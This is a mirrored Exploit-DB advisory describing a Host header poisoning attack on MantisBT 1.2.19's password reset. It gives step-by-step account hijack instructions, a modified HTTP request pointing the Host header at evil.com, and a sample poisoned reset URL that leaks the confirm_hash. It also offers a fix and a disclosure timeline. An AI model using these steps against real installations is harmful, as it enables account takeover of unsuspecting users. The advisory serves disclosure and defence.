bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/38068.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

86 lines
No EOL
2.6 KiB
Text
Raw Permalink Blame History

# Exploit Title: MantisBT 1.2.19 - Host header attack vulnerability
# Date: 07-09-2015
# Exploit Author: Pier-Luc Maltais
Centre opérationnel de sécurité informatique gouvernemental (COSIG)
# Vendor Homepage: https://www.mantisbt.org/
# Software Link: http://sourceforge.net/projects/mantisbt/files/mantis-stable/
# Version: 1.2.19
# Contact: https://twitter.com/plmaltais
http://plmsecurity.net/mantis_host_header_attack
==========================
Vulnerability Description:
==========================
MantisBT 1.2.19 is vulnerable to an Host header attack that can
be exploited by an unauthenticated user to hijack another user account.
==================
Technical Details:
==================
This exploit use the Host header attack to poison the link in the
password reset mail. You need to know the victim username and
e-mail. You also need a remote host that you control to catch the
verification hash needed for password reset.
1. Access the password reset feature and fill the form with the
victim username and e-mail.
http://{VULNERABLE_MANTIS}/mantisbt/lost_pwd_page.php
2. Using an intercepting proxy like Burp, change the Host header
with your evil host.
Original request :
POST /mantisbt/lost_pwd_page.php HTTP/1.1
Host : {VULNERABLE_MANTIS}
[...]
Modified request :
POST /mantisbt/lost_pwd_page.php HTTP/1.1
Host : evil.com
[...]
3. When the user receive the e-mail, the link is poisoned with
the evil host.
[...]
visit the following URL to change your password:
http://evil.com/mantisbt/verify.php?id=1&confirm_hash=81ece020dfcd6d53e02c5323583cdead
[...]
4. Now, when the victim click on the link to reset his password,
his verification hash will be sent to our evil host. All we
have to do is access the verify.php page with his hash, so
we can change his password and hijack his account.
http://{VULNERABLE_MANTIS}/mantisbt/verify.php?id=1&confirm_hash=81ece020dfcd6d53e02c5323583cdead
=========
Solution:
=========
Use
$_SERVER['SERVER_NAME'] (server controlled)
instead of
$_SERVER['HTTP_HOST'] (client controlled)
====================
Disclosure Timeline:
====================
16/02/2015 - Found the vulnerability
17/02/2015 - Wrote this advisory
17/02/2015 - Contacted developers on MantisBT forum
18/02/2015 - Opened an issue in the bug tracker
01/09/2015 - Still not patched, releasing this advisory.
===========
References:
===========
[1] http://www.skeletonscribe.net/2013/05/practical-http-host-header-attacks.html
[2] http://stackoverflow.com/questions/2297403/http-host-vs-server-name/2297421#2297421
Reference in a new issue View git blame Copy permalink